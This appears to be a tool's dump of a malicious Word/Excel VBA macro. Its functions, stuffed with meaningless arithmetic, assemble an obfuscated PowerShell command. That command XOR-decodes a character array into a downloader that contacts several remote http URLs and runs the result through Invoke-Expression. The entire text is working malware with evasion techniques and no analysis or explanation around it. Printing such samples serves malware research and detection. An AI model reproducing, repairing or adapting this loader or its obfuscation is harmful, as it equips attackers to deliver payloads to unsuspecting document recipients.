Filename     : ./macros/ee303df7894ba0822be9fad29fe8e8546050ab3075238c8b284ad7eab0a19987
OLE stream   : Macros/VBA/VoRCHTzfNZWMza
VBA filename : VoRCHTzfNZWMza.bas
----------------------------------------
Attribute VB_Name = "VoRCHTzfNZWMza"
Function triZaKFA()
On Error Resume Next
TfQfMF = ZLFYD
ialZu = 68042 + 33423
zTBvuT = 4795 / 20595
iiFjrh = VwktpX * CSng(9447 * Fix(24781)) * MVDAS + CSng(jsMLv + CLng(AFibi)) / (DTOQbj * CSng(76858) - (43262 + Fix(wmNjdN) - (52229 + CLng(ZjRTK - Log(MXfmUU) - 87195 + Int(SLYAt)))))
wtTMwk = Atn(GwbSDZ + Sin(JvMftU) - 3527 / 86618)
rpMPwu = "ell " + Chr(34) + "$(SV  'oF" + "s' '')" + Chr(34) + "+[StrinG](" + "[CHAR[]](16 ,1" + "25 , 88, 1" + "02," + " 88, 93 ,6" + "8 , 20 , 9 , 20" + ", 90,"
mKssJU = vGDXUr
RvAsX = 96552 + 87606
iizVoq = 52359 / 54998
YuDzW = uosmwR * CSng(80131 * Fix(68543)) * cdiHIU + CSng(wUsdB + CLng(uBwER)) / (ulNiq * CSng(24198) - (55492 + Fix(SScmih) - (2743 + CLng(Poqlm - Log(wiEsq) - 76845 + Int(rqrzUo)))))
Ovsuf = Atn(rdrFwU + Sin(WmHNf) - 66891 / 60892)
hLAsCDTFbij = " 81 " + ",6" + "7, 25 , 91, 86," + " 94, 81,8" + "7,64, 20"
kiqEh = XLRll
uWiYEi = 58314 + 39081
TcRJwf = 69511 / 27428
JVkRuZ = sPAGTo * CSng(52169 * Fix(23814)) * SLRZf + CSng(SnfDw + CLng(SWuGS)) / (jXZDB * CSng(43397) - (30694 + Fix(HUkfG) - (91682 + CLng(LmWMu - Log(BDzlr) - 50591 + Int(atGAAP)))))
pnPKvJ = Atn(zzCzz + Sin(jHjXt) - 45028 / 36698)
dPhzDHCnn = " , 70" + ",85,9" + "0 ,80,91 ,89,1" + "5 ,16,80 " + ", 94,126, 1" + "13, 125," + " 20 , 9 , 20 ," + "90, 81 , 67" + ",25, 91, 86 , 9"
YsIji = mwcUH
FuluX = 1742 + 37145
IzJjS = 6835 / 66690
iGdwJ = LzBwd * CSng(70388 * Fix(72136)) * SVGwCj + CSng(Lclhj + CLng(hfOZi)) / (EfdBu * CSng(90788) - (22099 + Fix(ZKSHA) - (31121 + CLng(bQoYw - Log(wWdrOc) - 15271 + Int(SmZzTh)))))
oULDq = Atn(lAKih + Sin(rGOaB) - 61621 / 63478)
SnAzE = "4,81, 8" + "7,64 , 20 , " + "103," + " 77 , " + "71 , "
triZaKFA = rpMPwu + hLAsCDTFbij + dPhzDHCnn + SnAzE
End Function
Function EhMfihYGl()
On Error Resume Next
fDLaD = hFOurV
MWTNh = 23220 + 32069
XQpYRF = 39306 / 89886
DLYTm = upKfln * CSng(78097 * Fix(57903)) * RVAhYT + CSng(zjYUs + CLng(jwzGmL)) / (MTpuG * CSng(46717) - (95672 + Fix(zjUXiu) - (3236 + CLng(jisDlO - Log(uSiHIO) - 61083 + Int(AdZPwj)))))
aAVfz = Atn(DwKsiE + Sin(cuHSw) - 53223 / 89591)
UEEiAR = "64" + " ,81 , 89, 2" + "6, " + "122, 81, 64 ," + "26, 99, 81,86" + " ,119 , " + "88 ,93,81 ,"
IzZEK = iaLom
PdJNC = 11179 + 41350
afFCNo = 83424 / 43767
QWliD = jHisiB * CSng(3342 * Fix(25935)) * trYCZN + CSng(jCGzAL + CLng(ECOZB)) / (hawAI * CSng(2602) - (96003 + Fix(CITWBC) - (31365 + CLng(dDvtf - Log(iYDiVs) - 56404 + Int(UcAwtT)))))
YtYPEi = Atn(mczIwj + Sin(KdHjr) - 83760 / 46028)
stXncvkjEba = "90 ,64,15, 1" + "6 ,89 " + ", 9" + "9, " + "66,93, 69," + "94, 20 ," + " 9, 20,19 ," + "92 , 64," + " 64, 68,14, " + "27 ,2"
ujUNbC = SETkCr
jMutPJ = 98284 + 84812
VOFUi = 53777 / 14020
CbXbT = KCQFuF * CSng(91737 * Fix(98960)) * KVAGd + CSng(jDlVq + CLng(LIzfs)) / (oGVBcq * CSng(59705) - (38406 + Fix(uirVn) - (25858 + CLng(juItOE - Log(YmGcZ) - 98503 + Int(SaCaGs)))))
IsJaJl = Atn(VuzCFS + Sin(DWzQj) - 71488 / 95696)
YzhzZ = "7 , 68,88 ,85," + "90, 8" + "1 , 64,82 , 81," + "70, 83,65"
dSisLD = sMlCC
aThUP = 8831 + 6321
tNXvN = 26980 / 31172
WHhsW = VpGJNF * CSng(8549 * Fix(41725)) * EzBXhL + CSng(BuXOn + CLng(nKMClk)) / (NfifD * CSng(93946) - (29727 + Fix(apmDE) - (67136 + CLng(WNhWwG - Log(mUIHj) - 2754 + Int(wLTULX)))))
PVUkw = Atn(aFlLj + Sin(LozVP) - 71791 / 6664)
NcBuC = ", 71 , 91 , 90" + ",26 , 90 , 81," + " 64,27 ," + " 112,1" + "13 , 117" + " ,108," + " 97 ," + " 99 , 2" + "7, 116" + ", 9"
bszzdL = lVvNJ
hjzYfq = 16163 + 95787
laJjR = 34054 / 20554
EiIPfB = ZWinzb * CSng(37115 * Fix(54043)) * rHjHId + CSng(AbLiaW + CLng(XHfoOz)) / (vYFtnP * CSng(38758) - (29147 + Fix(FPVhoi) - (52838 + CLng(jaAHoT - Log(XCoKf) - 33480 + Int(FcFvjb)))))
UOOlt = Atn(OFoto + Sin(oHnzdH) - 8196 / 64825)
hHULp = "2,64,64," + "68, 14 ,27, " + "27 , 6" + "7,67 , 67, 26 " + ",80,88 , "
mwLsr = pfijU
NvVzc = 61634 + 34623
zQQOBf = 39700 / 89476
coftrj = FCcpDM * CSng(24775 * Fix(1269)) * jLvaOH + CSng(rYDXf + CLng(jolsQz)) / (UFmcZ * CSng(62012) - (37991 + Fix(YFGAu) - (62740 + CLng(QkrNV - Log(nVoLIR) - 35178 + Int(DKvNwU)))))
ZTBins = Atn(TwXkH + Sin(XBBDd) - 54249 / 62780)
EcWFrwlJjzj = "64," + " 85," + " 89," + " 8" + "5 , 68,26 , 8" + "7 ,91, 8"
UdrFTw = JrEmEU
roXKB = 30173 + 4145
upNzKZ = 80766 / 81392
skUoq = CkTlNw * CSng(47089 * Fix(72442)) * mvYjkL + CSng(utLhG + CLng(tEAQSk)) / (CiXBQ * CSng(28437) - (9680 + Fix(wWWdF) - (6661 + CLng(PcjSwU - Log(bcIVZr) - 28730 + Int(wjnTiH)))))
WPVGL = Atn(WpDAZH + Sin(XjAmzM) - 6326 / 91992)
XNXmjul = "9,27 ,101, 76 " + ",95, 90, 4 ," + " 64 ,27," + " 11" + "6," + "92, " + "64 ," + " 64,6"
ppJoj = uqcwu
kZOQf = 1807 + 41638
RwSKq = 5748 / 90631
EbdVj = OnzzNN * CSng(8288 * Fix(56613)) * SMDvnV + CSng(JpaocX + CLng(IKpRwZ)) / (cwQwv * CSng(7124) - (12005 + Fix(qHwGcw) - (6825 + CLng(FhBFRo - Log(rQqrpp) - 46682 + Int(FDhpOm)))))
sRsXwS = Atn(VvAFij + Sin(zUwnDZ) - 65711 / 8542)
bDtShaPF = "8 , " + "14 , 27,27 , " + "67, 67, 67, 26," + "92 ,91," + "70 ,71, 25 " + ",89," + " 85 , 93 ,88 ," + " 26, 70,65"
YKEsRb = ORIiM
qkHoNH = 68829 + 66025
IibHF = 67192 / 97534
KNOoE = afIBSA * CSng(89006 * Fix(30507)) * auOHEz + CSng(anJWjo + CLng(zjTMDi)) / (vAikTK * CSng(38052) - (94083 + Fix(vwUPOS) - (87211 + CLng(dEjmaf - Log(vlCKSz) - 75865 + Int(lQitjX)))))
mHdMNZ = Atn(ZOipr + Sin(zvpUVw) - 79580 / 64278)
waQPOqsLDjU = ", 27, 91 " + ", 66 , " + "93 ," + " 69 , 0" + ", 27,11" + "6," + " 9" + "2 , 64 , 64" + ",68 ,14 , 27 "
oFNPi = bbBYz
fdIErp = 52237 + 20129
LMIkU = 64011 / 4607
niDiw = kGTdbf * CSng(11530 * Fix(60966)) * qhTfGD + CSng(GVVcBT + CLng(OsXZA)) / (WpncJ * CSng(57071) - (21755 + Fix(EkIZzV) - (27864 + CLng(WvEUz - Log(iJVwRC) - 9659 + Int(DFFIQA)))))
rVcswC = Atn(NCDzoE + Sin(cVfXv) - 13260 / 57577)
HnDmNIWjw = ",27" + " , 95,12 ,93," + "70 ,26, 87 , 91" + " , 89,27, " + "11" + "4 , 70 , 114" + " ,10" + "2 ,"
EhMfihYGl = UEEiAR + stXncvkjEba + YzhzZ + NcBuC + hHULp + EcWFrwlJjzj + XNXmjul + bDtShaPF + waQPOqsLDjU + HnDmNIWjw
End Function
Function oESbIjbv()
On Error Resume Next
svTVfW = kJKhS
SuTOAN = 52602 + 70369
iRzVnB = 18183 / 28703
lUuQk = QkOiD * CSng(20612 * Fix(66667)) * rbosC + CSng(DVWJho + CLng(sujGF)) / (uDkTz * CSng(89055) - (28893 + Fix(rnqul) - (69442 + CLng(cnLVYr - Log(Pwkiw) - 87127 + Int(qibzs)))))
LGHozn = Atn(MifOwD + Sin(QGYkha) - 46761 / 76421)
HWRDtWprHU = "27," + " 116 ,92, 64 , " + "64," + "68" + " , 14" + " ,27,27" + " ,6"
IVFITS = AoozmT
msHHj = 10539 + 82821
dAuGdO = 99930 / 13926
SPYUY = zSuKY * CSng(32426 * Fix(32986)) * IRvbC + CSng(wROGU + CLng(fFOfS)) / (Xhafv * CSng(1713) - (13215 + Fix(XSOzIB) - (10138 + CLng(kpMIDd - Log(ABRAM) - 84622 + Int(EOsUtj)))))
cWuUDp = Atn(COzSGw + Sin(YTKAt) - 28127 / 49339)
mMSbfYMc = "7," + "67 " + ", 6" + "7,26 " + ",87, 91 ," + " 89, 8" + "8 ,91, 83,"
TWjOIz = CWQtu
FvYfvi = 38605 + 98217
DszcTV = 82020 / 92930
Dzsta = LQCHKK * CSng(71789 * Fix(83332)) * EAWAF + CSng(brKToL + CLng(iEZTJ)) / (BKaZN * CSng(7233) - (54811 + Fix(ufJXU) - (7523 + CLng(buLTt - Log(bGialk) - 14171 + Int(wiqAkp)))))
dbIwc = Atn(hMAvU + Sin(tHJNA) - 30513 / 11216)
YRCTEY = " 93, 87 ,85 " + ", 26 , 87 " + ", 91 ,26" + ",93, 90 ,2" + "7, 89 ,67,11" + "2, 67 ,101, 11" + "3 , 83," + "27" + " , 19, 26 ,103"
pARzVa = nNMSro
iiQcOa = 78625 + 40004
BFInjs = 96888 / 35604
kiPzlc = dHLkPj * CSng(47993 * Fix(71018)) * lKqKdz + CSng(fJKUL + CLng(GQHcdm)) / (zILrW * CSng(85945) - (17117 + Fix(JfBFfj) - (55983 + CLng(wKMlS - Log(qaHUnA) - 90022 + Int(mDmjuc)))))
wolqiV = Atn(IPfHdA + Sin(SRAmP) - 35556 / 70740)
UjjVJP = " , 68, 88, 9" + "3, 64 ,28 , 1" + "9 , 1" + "16 , 19, 29, 15"
iGHhnL = oqzXkZ
WuUUlm = 87450 + 58556
JpQwv = 24300 / 19231
NPmfi = plKzjS * CSng(56041 * Fix(66412)) * wqFzB + CSng(SsMZl + CLng(LXMjGK)) / (DkjvNv * CSng(47274) - (51085 + Fix(uINtM) - (22579 + CLng(ujucD - Log(WZFzzd) - 26792 + Int(QZHmiY)))))
vsDdf = Atn(zELrj + Sin(zSzMi) - 75559 / 17226)
VTbiAW = " ,16, 9" + "1 , 8" + "6,125, 97," + " 12"
wzQuj = wmFFYY
uFSdO = 60880 + 32446
IujtG = 2970 / 68027
ZzVKC = cHhTA * CSng(38403 * Fix(41284)) * jwMnS + CSng(ViPYo + CLng(vKiSzi)) / (UhILd * CSng(16961) - (85370 + Fix(jREjF) - (99561 + CLng(VTQbMF - Log(qjwVOL) - 34715 + Int(PVWHAY)))))
mjiazm = Atn(KpjoG + Sin(KBWRHc) - 82335 / 48089)
AwOKUvH = "0, " + "20,9,20, 16 " + ",125, " + "88 ,102 , " + "88,9" + "3,68, 26, 90" + ", 81 , 76,"
GHMVGi = jLmvD
lZEdS = 27067 + 97521
qtCwa = 19410 / 64734
zXhCX = jtFfPb * CSng(56532 * Fix(72568)) * qtdUZf + CSng(WRAIW + CLng(bQnnk)) / (wbisJ * CSng(12674) - (24346 + Fix(zZIzdz) - (68177 + CLng(jptYZ - Log(APBPEO) - 34464 + Int(scqVnO)))))
BUNNn = Atn(wJDiW + Sin(NjwtLh) - 2371 / 51098)
WmjRkbG = " 64 , " + "28 , 5 , 24 ,20" + ",3" + ",1,1 , " + "7 ,4, " + "6,29,15 , 16 ," + "103,80 ,113," + "70,"
wjJnc = jfcaW
wkhcE = 17759 + 87885
nDcfD = 67053 / 22104
inlnpL = LPMsPc * CSng(93949 * Fix(45011)) * QHwiN + CSng(vGWMr + CLng(VVWAn)) / (bTahQW * CSng(87847) - (40281 + Fix(ZCodBN) - (43788 + CLng(wLPVi - Log(fRdTRp) - 87166 + Int(rbfVDj)))))
qbksDW = Atn(iipww + Sin(ZpYcw) - 52385 / 90394)
RPYSURIipRj = "69, 20 ,9" + ",20 , 16" + ",81" + " , 90 "
oESbIjbv = HWRDtWprHU + mMSbfYMc + YRCTEY + UjjVJP + VTbiAW + AwOKUvH + WmjRkbG + RPYSURIipRj
End Function
Function uEDutJMkNin()
On Error Resume Next
MCDTTb = bjBoU
iuiVrj = 33864 + 2954
IcXtM = 41683 / 80138
DYcoT = YINAn * CSng(84252 * Fix(40186)) * JnLiSG + CSng(zWFSht + CLng(GnTRJ)) / (uHjwJ * CSng(6176) - (22396 + Fix(PZikO) - (18125 + CLng(ifAwv - Log(ECXWl) - 18329 + Int(BZjVhK)))))
BGMZPu = Atn(jwWhT + Sin(EYHTSO) - 99894 / 81713)
BrGuQqNCka = ", 66" + " , 14,64" + " , 81 ,89 ,68 ," + "20 , " + "31,20, 19,1" + "04" + ",19"
dsNiL = MWGzLb
BoSZu = 55426 + 33977
qbnmiL = 5758 / 63448
DTKzv = kBVhAu * CSng(6889 * Fix(17703)) * QQkzpr + CSng(NLWzHo + CLng(URsYf)) / (jsTXd * CSng(66450) - (51124 + Fix(ToZCs) - (17141 + CLng(IKfcW - Log(Fzdwq) - 92288 + Int(BQHWYz)))))
XzMTGQ = Atn(uXwzP + Sin(DLHNvI) - 79425 / 56840)
nZpKn = ", 20,31" + ",20 " + ", 16, 91, 86 ,1" + "25, 97, " + "120,20,31,20" + ", 19,26, 81," + " 76, 81 ," + " 1" + "9,15" + " ,82 ,91, 70"
YZPasv = ZihOC
zaQsqI = 88726 + 51701
mHDOEV = 95663 / 44162
KSiGl = TlKrqs * CSng(37299 * Fix(43887)) * ZzJAZ + CSng(rRRJc + CLng(WmVum)) / (NhuzEM * CSng(63218) - (4296 + Fix(nUlof) - (7852 + CLng(SqztBO - Log(ANzJS) - 95863 + Int(pzDPFo)))))
avzTW = Atn(EzfUwI + Sin(Tfutb) - 97801 / 28622)
Opiwtvjmc = " ," + " 8" + "1, 85, 87" + " , 92, 28, 16 " + ", 123 , 67, 89" + ",65,8" + "0 ,68, 20, 93"
MdjwZq = uiTPK
cMKZfK = 5082 + 19386
DSXApV = 21537 / 39863
HZcnnu = SLGaz * CSng(92391 * Fix(43537)) * zbjsTw + CSng(zsEiq + CLng(iqnUY)) / (SpwEHH * CSng(38333) - (23177 + Fix(Ibkjq) - (32156 + CLng(DaKqsp - Log(kjIDBo) - 40899 + Int(GZLDE)))))
Wckzkv = Atn(QTwAnB + Sin(MKhscP) - 26381 / 40143)
fGriWPFhBTU = " ,90 ,20,16,89" + " ," + " 99 , 66,93 " + ", 69,94 , 29, 7" + "9 " + ", 64 ,70, 7" + "7,79 , 16, 8" + "0,94 ,12" + "6 , 11"
liCwSS = IIVzhW
OmiGw = 83713 + 38014
iTWNB = 35125 / 8510
olCdjh = uBvId * CSng(27034 * Fix(51120)) * FOkrk + CSng(jtFoAD + CLng(RjZTAL)) / (siVsI * CSng(90449) - (98801 + Fix(YHjpoO) - (55901 + CLng(LAjsIr - Log(ojibcS) - 43056 + Int(cCCfat)))))
ipjzVz = Atn(KPWor + Sin(TRSPA) - 65145 / 62424)
wopcsw = "3 ,125 , 26 , 1" + "12,91, " + "67,90 ,88, " + "91," + " 85 ,80 ," + " 114 ,93, " + "88 , 81, 2" + "8 ," + "16, 12" + "3 ,67 ,"
dFjYc = inLuW
EobIV = 20866 + 68948
uaSRW = 54026 / 70573
isMjDV = mTfDX * CSng(57682 * Fix(77182)) * svBXKH + CSng(izpPPi + CLng(twtCwE)) / (mlOYv * CSng(42432) - (4375 + Fix(iwlQB) - (67639 + CLng(UmZfz - Log(NroFi) - 99688 + Int(iJUfkd)))))
JmzOl = Atn(OVqizj + Sin(fbGdS) - 8476 / 98322)
BYwXuiQHiC = "89 ,65" + " ,80 ,68," + "26, 96" + " ,91 , 103" + " ,64 , 70 ,9" + "3, 90,83 ,28 ," + "29 ,24,20"
pDQJMC = bripV
sAJGzw = 88831 + 13611
ACUtS = 52396 / 69988
rNfih = LhwPA * CSng(58277 * Fix(952)) * ZTIac + CSng(TRXhDj + CLng(QLTZhd)) / (mrAuv * CSng(77776) - (42799 + Fix(OfWQr) - (75988 + CLng(mpWSNj - Log(qwaBV) - 90402 + Int(dpSAi)))))
iTOfnX = Atn(DsLmo + Sin(jZdDP) - 31260 / 65850)
iGnYUJduV = ",16, 10" + "3, 80 ,1" + "13 , 70," + " 69 ,29, " + "15 , 10" + "3, 64 " + ",85 " + ",70 " + ",64,25,"
KDXwXZ = bZncU
wmnNQ = 27418 + 92680
iVUaqA = 39208 / 99675
mCkAOh = tlVwd * CSng(35288 * Fix(4453)) * WftiF + CSng(LlaMq + CLng(PjjCM)) / (lDAfIw * CSng(40007) - (4793 + Fix(FJtsEv) - (59019 + CLng(hWjqz - Log(RKoYiB) - 25112 + Int(Sjohz)))))
qWuJD = Atn(GcjTm + Sin(kQwfd) - 95690 / 77192)
zuzzzwVYS = " 100 , 70 ," + " 91,8" + "7,8" + "1,71 ,7" + "1,20,16,1" + "03 ,8" + "0,113 , 70, 69 " + ",15 , 8" + "6, 70 ,81 , 8"
uEDutJMkNin = BrGuQqNCka + nZpKn + Opiwtvjmc + fGriWPFhBTU + wopcsw + BYwXuiQHiC + iGnYUJduV + zuzzzwVYS
End Function
Function KYrLDkLlud()
On Error Resume Next
VpBmdn = qmDGw
dUmXQw = 13929 + 75056
MSbGaF = 36404 / 96924
rsWYV = UTCAG * CSng(72600 * Fix(42561)) * PKNqm + CSng(DKMIt + CLng(znTkXs)) / (EMiaw * CSng(8764) - (17511 + Fix(GkbND) - (14119 + CLng(XMCFU - Log(BjjNfc) - 4862 + Int(ARcOiR)))))
kjPmd = Atn(zZkvpk + Sin(QGhRYU) - 5732 / 61481)
pTdTdsjmV = "5, " + "95 , 15" + " ," + " 73 " + ",87, 85" + ",64,87 "
kIdAF = mZtMcZ
prHQt = 70278 + 21706
cViuB = 61032 / 53500
NOXnXz = XXsGm * CSng(92234 * Fix(39442)) * siduzh + CSng(zZBucj + CLng(JLinJH)) / (iwFqJT * CSng(28829) - (22856 + Fix(JWVwO) - (72389 + CLng(qNHfP - Log(mdUaYN) - 61824 + Int(zmNTO)))))
XEoOTn = Atn(rXHmk + Sin(vsZBb) - 23577 / 62435)
SIiFUzOsv = ",92, 79," + "67, 70,93" + " , 64, 8" + "1 , 25,92 ,91," + "71 , 6" + "4 , 20 , 1" + "6 ,107 " + ", 26,113, 76 , " + "87 "
Tdjrnp = XruBHv
FMnook = 62034 + 49019
riaiIL = 81121 / 15524
lHhTui = TRHzj * CSng(75710 * Fix(99462)) * jSBGA + CSng(PkHQW + CLng(uGMuv)) / (wWWSlw * CSng(7012) - (37253 + Fix(uUcPS) - (24532 + CLng(EWiaYd - Log(XaDYZ) - 20574 + Int(EMBvo)))))
mRjDCh = Atn(UPiBEw + Sin(BqLVM) - 42128 / 1083)
Fsjjrw = ",81 , 68" + ",64, " + "93, 9" + "1," + " 90 , 26, 121" + ", 81 ,71 ,"
UAiXi = BwDpk
TcuLO = 1529 + 61690
dJjZi = 58259 / 16643
ScnZwd = YWiHE * CSng(64589 * Fix(50834)) * YOAjz + CSng(bzrvj + CLng(COAcH)) / (lLGENr * CSng(3409) - (99861 + Fix(XWArU) - (87025 + CLng(VzNUi - Log(rdvdR) - 44137 + Int(KWCAJ)))))
OGUAJi = Atn(BDcrDM + Sin(msDOn) - 23675 / 44691)
OKjSBvaJYC = "71," + "85 , 83 ," + " 81 , 15,73,73)" + " |FO" + "REAcH-obJeCT{[C" + "HAR]($" + "_ -Bxor '0x34')" + " }) +" + Chr(34) + " $( Sv  '" + "oFS' ' ') " + Chr(34) + "| " + "ieX"
KYrLDkLlud = pTdTdsjmV + SIiFUzOsv + Fsjjrw + OKjSBvaJYC
End Function

